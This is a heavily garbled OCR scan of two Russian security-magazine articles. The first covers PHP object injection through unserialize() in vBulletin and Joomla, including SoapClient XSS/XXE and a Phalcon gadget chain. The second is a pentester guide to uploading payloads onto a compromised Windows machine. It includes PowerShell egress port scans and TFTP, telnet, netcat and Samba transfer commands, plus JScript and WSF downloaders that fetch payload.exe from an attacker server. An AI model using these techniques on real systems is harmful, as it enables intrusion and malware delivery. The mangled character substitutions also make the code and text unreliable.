< 5 сда>аІегІ {1 );</ьсгірі> іп 
аррепсіег_ 50 Скет_$егѵег рИ 
Р -71 



Отсутствие какой-либо- фильтрации 



$еѵепі - пелг 5оарСІіеп> !.ііиИ, 
аггауСІосабоп' => 

І ,, ІІр://гсі7рг,Псііпе/ері.рІід 'пн => 

’ Е.ЦрУ/га&Ог.паспе/ ' ) 3 ; 

Іеѵепт = иг>:е гі аі Іге зрі іа і І 7 е і ^еѵе г т ) ; 
Іеѵег і *-> у еНоу сеі ІМа і г; е(К 



Схема реализации Х55 через ЗоарСЕіепі 



Опции 



риЫіс 5оарСІіепІ::5оарСІіепІ ( тіхесі $\л/зсй [. аггау $ор*іоп5 ] ) 



Іосаііоп 

ип 

Йуіе 

и$е 

$оар_ѵег$1оп 

іодіп 

РЭ 55 ѴѴОГ 6 

ргоху_Ио5і 

ргоху_рогі 

ргоху_„Іодіп 

рГОХу_ра 55 ѴѴОГСІ 

ІосаІ_сеП 

разарНше 

аиіііегііісаііоп 

сотргеььіоп 

епсосііпд 

Ігасе 

сІэ$5тэр 

ехсерііоп5 

соппесііоп_іітеоиі 

1 у ретар 

1уре_пзте 

1уре_п5 

^гот_хтІ 

свсЬе_ш6\ 

иаег^адепі 

5ігеат_сотех1 

Іеаіигеь 

кеер_аІіѵе 



ѴѴ5РІ. - ѴѴеЬ 5егѵісез Резспрііоп І_апдиаде 




ѴѴБОи^режим 

ш р 



Моп-ѴѴБОІ 



ІѵѵьсіІ — пиІІ 



ІѵуіиІ = пир 7 /ю гл еп 051 /ар і.ѵѵзаі 



5озрСІіеп1: невозможно 
сериализовать 



Объект можно 
использовать в 
ип^егіаііге 






пеѵѵ 5оарСІІепі(пиІІ ( аггау('Іоса1іоп' => 
’ ЬирѴ/гагОг.пате/арі.рЬр 1 , ' игі' => 

’ ЫШ Ѵ/гагОтате/ 1 ) ) ; 



Работа класса 
ЗоарСІіепІ 




1ѴѴѴІѴ 

РНР ОЫесІ Іп]есііоп 
наОѴѴАЗР: 

ЫМѵ/1 бѵЬѵАѴѴ 

ЗІіоскіпд 

іп РНР Ехріоііаііоп: 

ЫІ,1ѵ/11тсѵ Ну 

Магические 
методы РНР: 

Ы 1 Іѵ/ 172 апЬ 

* I * 

Арасіпе Іод 4 рНр: 

Ы1.1у/аР7|Н6 



XX Е ОиІ-о!-ВапсІ 
ОаІаНеІгіеѵаІ: 

ЫРІ ѵ /1 2 рѵМЬ 



Сериализованные данные после преобразования в объ- 
ект РНР могут изменить рабочий процесс приложения 
с помощью так называемых магических методов. Напри- 
мер, если у класса определен магический метод деІ(), 

то он будет вызываться каждый раз, когда у объекта запра- 
шивается несуществующее свойство. При эксплуатации 

РНР ОЬіесІ Іпіесііоп наиболее полезны методы ѵѵакеир() 

и сІез1:гисІ{): первый вызывается при десериализации 

объекта, второй — при выгрузке объекта, то есть при завер- 
шении работы скрипта. Оба метода вызываются автомати- 
чески, без необходимости проводить какие-либо операции 
над объектом. 

В сложных современных веб-приложениях без объектно- 
ориентированного подхода просто не обойтись, поэтому 
очень часто можно встретить деструкторы классов, кото- 
рые выполняют действия для выгрузки объекта. Например, 
класс взаимодействия с базой данных закрывает соедине- 
ние, класс кеша может удалять временные файлы. Именно 
в деструкторах таится главная опасность для разработчиков, 
которые зачастую не учитывают, что при десериализации 
возможна подмена свойств объекта на произвольные зна- 
чения. Многие популярные веб-приложения были затронуты 
РНР ОЬ]ео! Іщесііоп, в их числе Іпѵізіоп Роѵѵег Воагб, 9оотІа 
и ѵВиІІеііп. 

В последней версии ѵВиІІеііп я обнаружил любопытный 
ипзегіаІі 2 е(). Он показал, что полезными могут оказаться 
не только ѵѵакеирО и сІез1гис1{), все зависит от того, ка- 

кие данные ожидает веб- приложение после десериализации 
данных. И более того, необязательно ориентироваться только 
на собственные классы приложения, ведь есть и внутренние 
классы РНР, речь о которых пойдет ниже. 

смотрим ѵвинЕтш 

В плане безопасности популярный форум ѵВиІІеііп знал луч- 
шие годы. В пятой версии «вобла» еще дальше ушла от про- 
стого форума и стала громоздким комьюнити-комбайном. 
Ради праздного интереса я открыл папку соге {которая, 
к слову, не защищена .Ніассезз), где в инклудах обнаружил 



В современных веб-приложениях без объ- 
ектно-ориентированного подхода просто 
не обойтись, поэтому очень часто можно 
встретить деструкторы классов, выпол- 
няющие действия для выгрузки объекта 
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исходники Арасбе 1од4рЬр. Данный 
фреймворк — удобный инструмент 
логирования в РНР и используется 
в таких проектах, как ЗидагСВМ, 
ѵіідег и СМ3 Мабе Зітріе. Но если 
в этих веб-приложениях от Іод4рЬр 
остался только основной функ- 
ционал, то в ѵВиІІеІіп обнаружил- 
ся полный код фреймворка, в том 
числе доступная из веба папка 
с примерами использования лог- 
фреймворка. Один из скриптов 
оказался крайне любопытным: 
при обращении к нему на порту 
4242 запускался сервер, который 
при получении данных пытался их 
десериализовать. Так как полез- 
ных магических методов в Іод4ріпр 
найти не удалось, было решено 
обратиться к классам РНР. С помо- 
щью следующего скрипта я полу- 
чил список всех магических мето- 
дов в объявленных классах: 



ІосаІЬоаЕ о ! з.о. 
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ХХЕ через ипзегіаііге 
в^тіа 



Список получился объемным, но, как оказалось, почти все 
классы не позволяли сериализацию либо были бесполезны- 
ми. Внимание привлек класс ЗоарСІіепІ: и его метод саІІ(), 

который вызывается, если попытаться вызвать несуществую- 
щий метод. Это как раз то, что нужно, ведь в уязвимом скрип- 
те после преобразования данных в объект вызывался метод 
де1Яоо11_оддег(). Класс ЗоарСІіепІ имеет множество свойств, 
а при вызове несуществующего метода он позволяет отправ- 
лять 80АР-запросы на произвольные адреса. Уже интересно, 
посмотрим, что можно из этого выжать. 



80ДРСЫЕІІТ 

Конструктор класса ЗоарСІіепІ принимает два аргумента: 
адрес ѴѴЗРІ_- документа в формате ХМ!_, описывающий ЗОАР- 
интерфейс, а также массив опций. Если передать в каче- 
стве $ѵ/зсІІ значение МІЛ_І_, то объект будет инициализирован 
в поп-ѴѴЗО[_ режиме. Проблема в том, что при режиме с ѴѴЗОІ-- 
документом класс не предусматривает нормальной сериализа- 
ции свойств, а вот с поп-ѴѴЗОІ_ все в порядке. Поэтому остает- 
ся один вариант с $ѵѵзсІІ=пиІ] и ограниченным набором опций. 
Но даже с тем, что было доступно, получилось довольно много. 
Начнем с банальной ХЗЗ’ки, конструируем следующий объект 
ЗоарСІіепТ 



< ?рЬр 

$с = пец БоарСІіепІ^пи ІІ, агга; ( 1 игі , =>* = і 




Быстрый РНР* 
фреймворк РГіаІсоп, 
написанный на С 



Конструктор класса ЗоарСІіепІ принимает 
два аргумента: адрес Ѵ/ЗОЬ-документа 
в формате ХМЬ, описывающий 50АР- 
интерфейс, а также массив опций 



' Ыір:// ѣезі. сот/ ' л ' Іосафіоп '_=> 

' НгЕ1:р: //іе5± . сот/арі . рИр ' )Х; 

Контролируемый нами скрипт арі.рИр отдает НТТР-ответ 
с кодом 404: 

< ?рЬр 

Неасіег С "НТТР /1 .0 404 <5сгір1:>а1ег1:1' 1)</зсрір1:>"^ ; 

Вместо статус-сообщения «N01 РоипсІ» арі.рбр отправляет 
произвольную строку, ЗоарСІіепІ: видит код 404, генерирует 
исключение ЗоарРаиІІ:, сообщая о том, что удаленный ресурс 
не найден, и возвращает нашу строку в тело ответа. 

Одна из возможностей ЗоарСІіепІ — локальное кеширова- 
ниеѴѴЗОЬдокумента. Хотя это не помогло бы эксплуатации РНР 
ОЬіесІ Іпіесііоп в ѵВиІІеііп, все же стало интересно, как это де- 
лает ЗоарСІіепІ. Оказалось, что документ сохраняется без вся- 
ких проверок соответствия пути директиве конфигурации РНР 
ореп_ЬазесІіг, которая запрещает файловые операции вне ука- 
занного каталога: 

<?рЬр 

іпі^Бе'Ц ' ореп^Ьазебіг '. А ' /ѵаг/ыш ' ^ 

іпі 5е*( ' 5оар_ ! _ы5сі1_сасМе_епаЫесІ 1 , ^гие),; 

іпі 5е~Е( ' 5оар.шзсІ1_сасМе_сІіг1^ 1 /•Ьт р ' 1 : 

$с - пем ЗоарСІіепІ: ( 1 НЬЕр: //±ез± . сот/1:езѣ . мзсіі ’ . 
аггаѵГ ' сасбе ѵмасЛІ ' => Ілі501_САСНЕ_0І5К) 

Итак, нужно было что-то более интересное, чем просто ХЗЗ. 
Почему бы не ХХЕ, ведь ЗОАР работает с ХМі_? И действитель- 
но, ЗоарСІіепІ был уязвим перед внедрением внешних ХМІ_- 
сущностей, даже несмотря на то, что при попытке парсинга 
РОСТУРЕ сообщал, что он не поддерживается! Дело в том, 
что исключение вызывалось уже после обработки ОТО, а в ис- 
пользуемом ХМЬ парсере І_іЬХМ!_ опция обработки внешних 
сущностей включена по умолчанию. Никакого вывода сущно- 
стей добиться не удалось, однако помогло замечательное ис- 
следование реализации ХХЕ через внешние каналы связи моих 
коллег Алексея Осипова и Тимура Юнусова. Техника позволя- 
ет отправлять содержимое файла через НТТР-запросы пря- 
мо в запрашиваемом пути. А вместе с разнообразными РНР- 
обработчиками схем удалось добиться чтения любых файлов. 
В этом помог враппер ріір:// и фильтр Ьазе64: 

рИр: //1і1'Еег/геасІ=сопѵег'1:. Ьа5еб4-епсосІе/ге5оигсе =+-» 
/е{:с/ра55жі 

Итак, эксплуатация РНР ОЬіесІ Іпіесііоп через внутренний 
класс РНР оказалась успешной. Помимо ѵВиІІеІгп , данный век- 
тор будет работать в ^Іоотіа <=3.0.3, где через ипзегіаІігеО воз- 
можна 30 1_- инъекция и удаление произвольной директории. 
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Старый новый ипзѳгіаіігѳ 




Вполне очевидно, что не всегда можно встретить вызов ме- 
тода на десериализованном объекте, и, к сожалению, в классах 
РНР нет ни одного деструктора, который брал бы из свойства 
объект и пытался выполнить у него какой-либо метод. Если об- 
ратиться к популярным компонентам, то одним из самых под- 
ходящих будет шаблонизатор ЗтаіТу. В нем можно встретить 
следующий код: 

<?рНр 

риЬІіс ТипсЫоп сІе5~Егис1: ( ) 

і 

і-Р ( $і ІіІ5-> 5т агЕу->еа с1іе 1оскіп§ && ±± 

іззеі: ($11115- >сасІіесі) && $1:ИІ5^і>сасІпес1->*^ 

І5 Іоскес О { 

$1: Ігі5->еасІі е сІ->ІіапсІ1ѳг->г , е 1еаз еІ.оск*-і 

($'1:ЬІ5- і>5тагѣу, $1:І'ііз->сасІіесІ) ^ 

1 

-> 



Если поместить в свойство Гіапсііег наш объект ЗоарСІіепі, 
то операции над объектом в коде веб-приложения не потре- 
буются и ХХЕ будет проэксплуатирована автоматически через 
метод сІе5Ішс{{ ) . 

ѴѴНАТ’8 N ЕХТ? 

В РНР 5.5 намечается нововведение в функции ипзегіаІігеО, 
а именно второй аргумент, который позволит разработчикам 
запретить обработку объектов либо указать белый список раз- 
решенных. В настоящее время используются регулярные вы- 
ражения, которые зачастую можно легко обойти, либо данные 
не проверяются вовсе. Например, в Іпѵізіоп Ро\ѵег ВоагсІ <= 
3.3.4 была вот такая смешная проверка: 

$_ѵа1ие = $_С00КІЕ[ ір5Ке§І5І:г у : : $зе1:1:іпе5*-< 

[ ' соокіе_ісІ ' ] . $пате ] ^ 

ІТ { зиЬ51г( $_уа1ие л 2 ) == 1 а : ' ) { 

гехигп ипзегіа 1 І 2 е( 5~Егір5Іа5Ііе5( игісіесосіе*- 1 
( $_ѵа1ие ) ) ); 

> 



В строке проверяются первые два символа: если это 
«а:», то есть сериализованный массив, то строка попадает 
в ипзегіаІігеО- Однако атакующему ничто не мешает отправить 
массив объектов, что приведет к обходу проверки. 

Говоря о будущем РНР ОЬіесІ Іщесйоп, стоит расска- 
зать о РНР-фреймворке следующего поколения под именем 
РИаІсоп, который становится все более популярным у веб- 
разработчиков. Весь его код написан на чистом С, что дела- 
ет его самым быстрым РНР-фреймворком. Ріпаісоп реали- 
зован в качестве расширения РНР, соответственно, требует 
компиляции и включения в конфигурацию РНР. При этом все 
классы фреймворка становятся доступными в контексте 
веб-приложения без каких-либо инклудов внешних файлов. 
Если представить зНагесі -хостинг, у которого РНаІсоп включен 
для всех пользователей по умолчанию, то очевидно, что это 
позволит использовать классы фреймворка через ипзегіаІігеО, 
даже если уязвимое веб-приложение написано не на его базе. 
Я решил проверить, возможна ли эксплуатация ипзегіаІігеО че- 
рез классы Рііаісоп, и оказалось — очень даже просто! 



В РНР 5.5 намечается нововведение в функ- 
ции ипзегіаІігеО, а именно второй аргу- 
мент, который позволит разработчикам 
запретить обработку объектов либо ука- 
зать белый список разрешенных 
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ПСЕ с помощью 
классов фреймворка 
РГіаІсоп 



рЬа1соп_геад_ргорегЪу_~ЕІ'іІ5('&ор1:іоп5 . <-■ 

і Мз р-Ег. 5І_ Г" ор-ЕІОПЗ"). РН_ШІ5Ѵ_СС)^ 

іТ (рИаІ со п агг а у із зе^ з1:гіп^ (ор'Ьіоп5. <-і 

55( "тосІе ,, )’>) { 

РНАІС0М_0В5_ѴАК(то<Ле) ; 

рНаІеоп аггау •Ре і сРі 5Егіп^(&тос Іе. о р іііопз , 
51_("тосІе ,, > . РН М0І5У СС') : 

} еізе { 

РНАІСОІ\І_]ШТ_Г\ІѴАК ( тосіе) ; 

2УА1__5ТК:ШС{тос1е, 11 аЬ” , 1)_і 

.1 



// Ке-ореп іЬе іпіе ИапсІІег ІТ ѢІіе Іо^дег ма5 
// 5егіа1ігесі 

РНАІСОМІМІТѴАКШеЬапсІІе г) : 

РИА Ь С 0І\І_С А !_ и_РШС_Р АРАМ 5 2Ш е ИапсІІе г. <-■ 

"•Роре п" . раѣііл тогіе); 

рііа1соп _и рсІа^е_ргорег'Ьѵ_1:Ііі5(1ііІ5_р1:г , ^ 
51_Г йТ е НатЯег" > . Діе М апсІІе г Т5КМ І.5 СО : 



РНА1_С0М_ММ_КЕ5Т(ЖЕ ( ) ; 

1 



Данный код получает из ргоіес^есі-свойства _раф путь и от- 
крывает его функцией {орепО в режиме, передающемся в свой- 
стве _ор , (іоп5. С помощью данного кода можно открыть тысячи 
файлов и забить все дескрипторы, но это неинтересно. Но что, 
если поместить в раіИ объект? При вызове Тореп{) он будет 
преобразован в строку, за что отвечает магический метод 
Ш3ігіпд{). А вот этот метод РГіаІсоп использует очень широ- 
ко. Я не буду описывать все внутренности фреймворка, скажу 
лишь, что в одном из 1оЗігіпд() удалось добиться инициали- 

зации произвольных объектов и вызова любых методов. Уже 
на этом этапе можно подсунуть наш ЗоарСІіепІ и провести ХХЕ, 
но ПСЕ всегда лучше! Пробежавшись по исходникам на пред- 
мет вызова функции рГіаісопгедиіге (инклудит файлы так же, 
как и гедиіге в РНР), я обнаружил класс \РГіаісоп\Мѵс\Ѵіеѵѵ\ 
ЕпдіпеХРГір, в котором метод гепсіег позволяет инклудить про- 
извольные файлы. Таким образом, через ѵѵакеирО удалось 

вызвать ІюЗігіпд, а через него — подключение произвольных 

файлов. Видеодемонстрацию смотри на диске. 

РШ 

РНР ОЬіесІ Іщесйоп все еще жив и будет жить. Вместе с «без- 
опасной» версией ипзегіаІігеО в РНР 5.5 появится много новых 
классов, и, возможно, не без уязвимостей. Так что смотрим 
в будущее! НС 



РНАІХСШ 

Получив магические методы из всех классов фреймвор- 
ка, я не нашел ни одного деструктора, но обнаружил один 
шакеир(): 

<?рНр 

РНР_МЕТНОР{РНа1соп_Іо§§ег_Асіар'Ьег_Рі1е, макеир){ 

гѵ аі *ра~ЕН. ^орТіопз^ *тосіе = N 1111. *Я1е_НапсІ1егі 



РНАІ.СОМ_ММ_бКОІлІ Ш 



РНАІ_СОМ_ОВ5_ѴАР ( раШ : 

рі іаісоп геагі ргор ег ѣу фііізе 

(&ра-Ыі л 1:ИІ5 р1:г, 5и и ра-Ыі "), РН_М0І5У_СС); 



РНАІСОМ_ОВ5_ѴАК ( ОрІіІОПЗ X; 



і рврцшпп — ТГ 

СО Ѳ В СЕ 



ігп п 74 



о 
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Заливаем полезную нагрузку на машину под управлением ІѴіпдоѵез 

Как правило, большие и средние компании строят свою инфраструктуру на решениях МісгозоТС. 

В основном это парк машин наХР/7, состоящих в домене с функциональным уровнем леса — 
ѴѴіпсІоѵѵз Зегѵег 2003. Периметр и демилитаризованные зоны часто представлены *піх-Ііке систе- 
мами. В нашем распоряжении есть лишь минимальный набор инструментов, немногим варьиру- 
ющий от версии к версии ОС, который позволяет в полной мере выполнить поставленную задачу. 




авай определимся с ситуацией — она банальна и по- 
вседневна для пентестера :). Имеется некий вектор 
атаки, позволяющий выполнять команды ОС. Сер- 
вер м ожет н аходиться н а пери метре , в дем и л итари - 
зован ной зоне ил и в интранете. Эти условия неприн- 
ципиальны. Чтобы был о проще, давай введем такие именования: 

• ТАРЮЕТ — машина, на которой имеем выполнение команд, 
набазеѴѴіпсіоѵѵз, у нее только один сетевой интерфейс, смо- 
трящий внутрь сети {192.168.1.10); 

■ САТЕ — шлюз, который связывает внутреннюю сеть и ин- 
тернет. Ось непринципиальна. Соответственно, на нем два 
сетевых интерфейса (192.168.1 .1 и 5. 5. 5. 5); 

• АТТАСКЕН — наш подконтрольный сервер, на базе Васігаск 
5гЗ / КаІІ І_іпих, с ІР-адресом 1 .2.3.4. 



ГІПЕѴѴАЫ.НОІ.Е8 

Прежде чем начать передачу целевого файла, важно найти 
способ надежного соединения с узлом. Поиск прямых каналов 
связи на транспортном уровне с эксплуатируемым узлом (ІР: 
192.168.1.10) решается последовательным перебором пор- 
тов на контролируемом сервере (ІР: 1.2. 3.4). Из стандартно- 
го инструментария можем воспользоваться ТеІпеІ, пзіоокир, 
РоѵѵегЗИеІІ. Теіпеі и пзіоокир целесообразно использовать 
в версиях до ѴѴіпс1о\л/5 2003 включительно, а начиная сѴѴіпсіоѵѵз 
Ѵ ізіа рекомендуется использовать Роѵ/егЗІлеІІ. В принципе, 
если бы не досадная ошибка в пзіоокцр, у нас мог бы быть 
универсальный инструмент для всех версий ѴѴіпсіоѵуз. Очевид- 
ный факт: если в системе нет Теіпеі, то там есть РоѵгегЗІіеІІ. 
Для того чтобы понять, когда именно к нам придет подключе- 
ние, запустим покорный Ісрсіитр: 



ѣсрсіитр І105І: 5. 5. 5 . 5 

В свою очередь, будем пробовать подключаться к нашему внеш- 
нему серверу с машины, на которой у нас выполнение команд. 
Для версий ѴѴІпсІоѵѵз <= ѴѴІпсІоѵѵз 2003: 

ТСР- по р ты: 

РОК Ц %і ІІЧ (1 л Хі 65535) Ш (сіжі /с "зіагі /Ь_е 

Теіпеі 1 . 2 . 3 .4 %і") 



Ц РР-порты: 

РОК /I %ІІН (1,1., 65535) 00 ( стсі /с “з ТагТ /Ь _■ 

пгіоо кир -р огі=%і уа.ги 1. 2.3.4" ) 

Для ѴѴІпсІоѵѵз Ѵізіа и более поздних версий винды будем ис- 
пользовать РоѵѵегЗИеІІ. 




Вячеслав Егошин 





Стандартные 

настройки 



Т СР- порты : 

Гипсііоп зТ{ІІР.$РогЬ) {$АсЮгезз = [ Бузіет . пеТ .«=: 

ІРАсІфгезз] : _:Раг5е($1Р) ;$ЕпсІ = Мем-ОЬдесТ БузТет .^ 
ІМеТ .ІРЕпсіРоіпІ: Ба сШгезз . $рогТ;$5ас1сіг-р - [БузТеш.^ 

ІМеТ .5оскеіз.АсІсІге55Раті1у] : : ІпТегІ\Іе’Ыогкі+-' 

$5Туре = [БѵзТет.Меі.БоскеТз.БоскеТТѵре] : :<-■ 

Бігеат : БРі уре = [БузТет. МеІ.БоскеТз.РгоіосоІТуре] 
ТСР;$5оск = Меш-ОЬдесТ: БузТет.ИеТ.БоскеТз. Боскеі <-» 

Бзасісіг-Р. $зТуре^ Бріѵре ;Б5оск.ТТІ = 26;Тг у <-■ 

{ Ізо ск.Сопп е сТ(ІЕпсІ) : [Ву 1 :е[ ] ] БМезза^е = «-» 

[ сНагП 1 " ыѲЭТцѲЭТ 11 ; $ 5епТ = $Боск.БепсІ($Ме55аЕе ) 

$зоск_. Епс1СоппесТ($СоппесТ) } саісИ {}:$5оск.<- 1 

СІозе П :>:1. . 65535 [ %{ зТ -ІР 'Л.2,3,4" -Рогі $_ } 



ОРР -порты: 

іипсііоп зЩ $ІР , Цпі]$РогТ){$Ас(сІге5 5 = [зузіет .*-' 

пеТ . ІРАсЦгезз] :_:Рагзе($ІР)д$ЕпсІ - ІЧе^ОЬдесі 

БузТет.ІМеІ: ЛРЕпсІРоіпі/БАсісІгезз,, Бро гТ) : $ 5 а сі сі р-Р=^— ■ 
[БузТет.МеТ .БоскеіБ .АсІсІге55Раті1у]_л ІпТегІУеТцогк;*- 1 

Б5іуре= [ 5 узіет.№ 1: .Боскеіз .БоскеіТур е] : :Р §г ат;<-< 

БРТурегІБузіет.ІМеІ: .Боскеіз . РгоіосоІТуре] ; : ЦРР : * 

$5ос к=Мем-0Ьд есі БузТет.МеТ .БоскеТэ .БоскеТ 

Бзас ІсІгТ . $зТуре л $рТуре;_$5оск ЛТІ = 26;$50ск.<- 

СоппесТ($епсІ); $Епс=[5уз1:ет.Тех1: . Епсосііп^] : 

А5СІІд.$Ме5заёе -^и00Ти00Т"і$ВиТТег=$1пс .ееіВуіез^ 
($Иезза^е) ; $5епі=$Боск . 5епсІ($Ви-рРег) ; }; 1. .65535 |<-< 
%{ зУ -І Р "1.2.3. 4” -РОРТ $_ } 
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Естественно, куски этого кода необходимо заэнкодить 
в Вазе64, после чего передавать полученное значение как ар- 
гумент к команде РоѵѵегЗІіеІІ с параметром -епсобебСоттапб. 

Также стоит упомянуть о таком проекте, как Іеітеоиіоіуоиг 
(ЬШу/і- - Р) от @тиЬіх для проверки доступных каналов во 
внешнюю сеть. На любой НТТР-запрос отвечает ѵѵООіѵѵООі. 

РТР 

Признан самым распространенным способом загрузки це- 
левого файла и вообще является одним из старейших про- 
токолов прикладного уровня. Основные достоинства загрузки 
через РТР — простота использования и наличие приложения 
во всех версиях систем. Если хост находится за МАТ, то в боль- 
шинстве случаев необходимо использовать режим работы 
раззіѵе тобе, иначе сервер не сможет подключиться к кли- 
енту. Существуют реализации расширений для ІЧАТ и сетевых 
экранов, позволяющие клиентам работать в активном режи- 
ме, но это большая редкость и небезопасно. Стандартная 
функциональность позволяет указать любой порт удаленного 
сервера. 




\ѴАІШШС 

Информация предо- 
ставлена исключительно 
в ознакомител ьных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности залюбой 
возможный вред, при- 
чиненный материалами 
данной статьи. 



ТРТР 

Клиент ТРТР реализован во всех версиях семейства ѴѴіпбоѵѵз, 
но начиная с версии ѴѴіпбоѵѵз Ѵізіа отключен и не доступен 
по умолчанию. Особенность ТРТР — он основан на транспорт- 
ном протоколе ІЮР. Зачастую при полной фильтрации ТСР уда- 
ется передать файл по ІЮР. Достаточно запустить сервис 



аѣР'ЬрсІ --баетоп --р огі: 69 /1:тр 



и выполнить на клиенте последовательность простых команд 

бізт /опііпе /епаЫ е--РеаФиге /Теа1:игепате:ТРТР 
1:Р1:р - і 1. 2. 3.4 С ЕТ р ауіоаб.ехе 

ТЕШЕТ 

Клиент Теіпеі также реализован во всех версиях семейства 
ѴѴіпбоѵѵз и также отключен и недоступен начиная с версии 
ѴѴіпбоѵѵз Ѵізіа. Задумывалось, что Теіпеі будет использовать- 
ся для работы с протоколами уровня приложений. Клиент 
тоже поддерживает работу на транспортном уровне, правда 
с некоторыми особенностями, для нас не важными. Исполь- 
зование клиента Теіпеі в качестве транспорта для бинарных 
файлов невозможно из-за специфики протокола (более под- 
робно в ВРС854 про <СР!><1_Р>). Поэтому без потерь можно 
передавать файлы, содержащие стандартный набор А5СІІ- 
символов. 

На сервере запустим пеісаі, который будет передавать со- 
держимое нашего файла: Неправильная кон- 

фигурация сетевого 

пс 20 -Іѵр 23 < еѵіф. Ьаі: экрана 




На клиенте же, в свою очередь, заэнейблим Теіпеі, если 
он отключен: 

бізт /опііпе /епаЫе-ТезФиге /Феафигепате:^ 

ТеІпеіСІіепІ: 



и таким нехитрым способом подключимся к серверу и сохра- 
ним в файл то, что он нам передал: 

тобе СОМ СОІ-5=20Ѳ0Ѳ0 && Феіпеі: 172.16.61.21 -Т ±± 
с_:Лсоттапб . Ьаі 

тобе СОМ С01_3=200000 устанавливает количество колонок 
(читай — символов), после которого клиент Теіпеі добавит сим- 
волы <СВЖ1_Р>. В принципе, если максимальная длина не пре- 
вышает настроек Ііпез, то можно специально не задавать. 

Ключ -I клиента Теіпеі позволяет записывать зібіп сессии 
в указанный файл. Кстати, так же можно использовать в *піх, 
если в наличии нет доступного инструмента. Обязательное ус- 
ловие успешной эксплуатации — наличие символов <СЯХІ_Р> 
в конце строки. Быстро сконвертировать файл, созданный 
в *піх, можно командой 

ипіх2боз еѵіІ.Ьа'І 



5АМВА 

ЗаітЬа — свободное ПО, в серверной части которого реализо- 
вана работа с протоколом ЗМВ/СІРЗ. СІРЗ — протокол уровня 
приложений для работы с файловой системой по сети. Рас- 
смотрим ситуацию, когда невозможно получить вывод команд, 
команды выполняются от непривилегированного пользователя, 
нет доступной для записи директории. В этом случае целесо- 
образно установить на контролируемом сервере (ІР: 1.2. 3.4) 
службу ЗатЬа, настроить гостевую аутентификацию и разре- 
шить запись в директорию. 

Конфигурируем (/еІс/затЬа/зплЬ.сопІ) и запускаем ЗатЬа: 

ШоЬаІ] 

могк^гоир = Ы0КК6 К0ЦР 
$есигіі:у = зііаге 

пефЬіоз = /ГЕ5Т 

зегѵег зфгіпё = %Ь зегѵег (5атЬа^ 1!Ьипі:и) 



[зііаге] 

соттепі: = Рііе Зегѵег ЗЬаге раіііі = /~Етр/зііаге <-> 
ЬгоыБаЫе = уе5 ыгіІаЫе = уез §иезі: ок = уез 
геаб _оп1у_= по сгеафе та5к = 0755 

и запускаем сервис: 

зибо зегѵісе зтЬб з’ЬагІ: 



После чего монтируем только что созданный ресурс как диск 
пеФ изе Хі Х М.2.3.4 
и копируем необходимый файл 
сору Х:\рау1оаб.ехе С^\рау1оаб .ехе 

ѴѴШООѴѴ8 ЗСВІРТ Н05Т 

Что это вообще такое? ѴѴЗН - автономный сервер, предна- 
значенный для выполнения сценариев на уровне ОС. Является 
встроенным компонентом и присутствует во всех версиях на- 
чиная с ѴѴіпбоѵѵз 2000. По умолчанию интерпретирует два типа 
сценариев. Первый тип — автономные сценарии, реализован- 
ные на языках ѴВЗсгірІ/бЗсгірІ. Как правило, файлы сценариев 
имеют расширения ѵЬз, ѵЬе и ]з, ізе соответственно. Второй 
тип — файлы ѵѵзі (ѴѴіпбоѵѵз Зсгірі Рііе). Это текстовый документ, 
содержащий код ХМ Ь. 

ѵвзстрт/бзсвірт 

Скриптовые объектно-ориентированные языки программи- 
рования, интерпретируемые сервером ѴѴіпбоѵѵз Зсгірі Нозі. 
Серверов, кстати, два: сзсгірі — консольный и ѵѵзсгірі — интер- 
активный. Сервер по умолчанию — ѵѵзсгірі. Эти языки создава- 
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Грузите файлы пачками! 



«5 




Монтирование удален- ГОБІТЕа ~РЬр : //1 . 2 . 3 . 4 Г 21/раѵІоасІ . ѵЬ5 
ного ресурса гпБЬЬа \\1 . 2 . 3 .4\ра у1 оасІ . ѵЬб 

Выполняем ѴВЗсгірІДІЗсгірІ как аргумент запуска команды: 



лись для автоматизации рутинных действии, администриро- 
вания и обработки данных. Для доступа к элементам системы 
используют СОМ (Сотропепі ОЬіесІ МосІеІ}. Кстати, если собе- 
решься написать что-нибудь, при прочих равных условиях вы- 
бирай ЗЗсгірІ, так как он имеет приятный легко читаемый син- 
таксис и поддерживается многими ЮЕ. К сожалению, передать 
скрипт как аргумент серверу ѴѴ5Н нельзя. Обязательно нужно 
указывать путь к сценарию. Процедура, реализующая получе- 
ние файла с НТТР/НТТР5: 

^ипс1.іоп НТТРбеЬОомпІоасЦигІ^ іііе ) { 



// Создаем НТТР -объект 

ѵаг ЬЫр =_пеы АсЕіѵ еХОЬ] ес 

( "ЫіпНЬІір.ІлІіпНІіЬрРІедиеБІ:. 5 . 1"^ 

// Обращаемся по указанному ЦК1_ 

ІгЕ-Ер.орепС'б ЕГ' . игі )_і 

ЬФФр.зепсІСХі 

ѵаг 5Ьгеат = пем АсЬіѵеХОЬіесІ:^ "АРОРВ. БЬгеат" ); 
Бігеат . Туре = 1; 

5І:геат.ореп(Х; 

II Записываем получаемый поток данных 

// в целевой файл 

5'Ьгеат.мг:іфе(Н'Ь1:р.те5роп5еВосІуХі 

з^геат. 5аѵеТоРі1е(й1е л 2) ; 

і 

НТТРСеІіРоипІоасІ ( " НЬЬр :/ /1.2.3. 4/рауІоасІ . ехе " . <-■ 
"рауіоасі. ехе" ).; 

Ѵ7І N 0 0ѴѴ5 5СПІРТ РНЕ (ѴѴРЗ) 

Сценарии ѴѴЗР могут одновременно содержать ЗЗсгірІ- 
и ѴВЗсгірІ-сценарии. Это сделано для того, чтобы увеличить 
гибкость написания кода, а также обеспечить модульность и по- 
вторное использование кода. 

Вот несколько набросков, которые реализуют передачу 
файла с различных ресурсов: 

> НТТР/НТТР5 

<ЗРЬ><5сгір1: 1ап§иа§е="ѴВ5сгір1:" 5гс="ІтЬѣр: //<-> 

1.2. 3 .4:80/рау1оаи . ѵЬ5”></5СГІр1:></іоЬ> 



> РТР 

<ЗоЬх5сгір1 1апёиа§е=' 1 ѴВ5сгір1;" 5Гс="-РЬ р: /Л-> 
1 . 2 .3 . 4 : 21/рау1оасІ . ѵЬ5"х/ 5СГі рЬх/іоЬ> 



> ІІІЧС 

<іоЬ><5сг ір± 1 ап^иа§е=“ѴВ5сгір1 " 5го="\\1. 2.3.4\<-> 
ра уі оасі . ѵЬ5"х/5сгір1х/^оЬ> 

На просторах Сети добрый китайский коллега 222 ЕѴА 222 ре- 
ализовал скрипт Апу2ВаІ — любой файл путем преобразований 
можно сконвертировать в Ьаі. Логика работы проста: создается 
файл — архив саЬ, преобразуется в Вазе64 и оборачивается 
